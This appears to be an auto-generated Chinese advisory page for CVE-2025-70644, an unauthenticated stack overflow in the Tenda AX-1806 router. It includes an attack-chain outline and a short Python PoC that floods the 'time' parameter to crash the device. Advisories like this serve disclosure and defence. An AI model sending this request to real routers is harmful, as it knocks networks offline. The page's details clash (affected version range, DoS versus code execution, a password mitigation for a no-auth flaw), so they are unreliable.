IPBUF安全漏洞报告
English
CVE-2025-70644 CVSS 7.5 高危

CVE-2025-70644 Tenda AX-1806 栈溢出漏洞导致DoS

披露日期: 2026-01-21

漏洞信息

漏洞编号
CVE-2025-70644
漏洞类型
栈溢出
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tenda AX-1806 v1.0.0.1

相关标签

栈溢出Tenda路由器DoSCVE-2025-70644

漏洞概述

CVE-2025-70644是Tenda AX-1806 v1.0.0.1路由器中的一个栈溢出漏洞。漏洞位于sub_60CFC函数处理time参数时,攻击者可通过构造恶意请求触发栈溢出,最终导致拒绝服务(DoS)。该漏洞无需认证即可利用,影响路由器的可用性。

技术细节

漏洞源于sub_60CFC函数对time参数的边界检查不足。当接收到的time值超过预期长度时,过长的数据会覆盖栈上的返回地址和其他关键变量,破坏程序执行流程。攻击者通过发送精心设计的HTTP请求即可利用此漏洞。

攻击链分析

STEP 1
信息收集
识别Tenda AX-1806 v1.0.0.1设备
STEP 2
构造恶意请求
在time参数中注入超长字符串触发栈溢出
STEP 3
执行攻击
发送精心设计的HTTP请求到/cgi-bin/time端点
STEP 4
触发漏洞
栈溢出导致程序崩溃或执行任意代码
STEP 5
造成DoS
路由器服务中断,无法响应正常请求

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target = 'http://target:8080' payload = 'A' * 1000 # 构造溢出数据 data = {'time': payload} response = requests.post(f'{target}/cgi-bin/time', data=data) print(response.status_code)

影响范围

Tenda AX-1806 < 1.0.0.1

防御指南

临时缓解措施
限制对路由器管理接口的访问,使用强密码保护管理面板

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表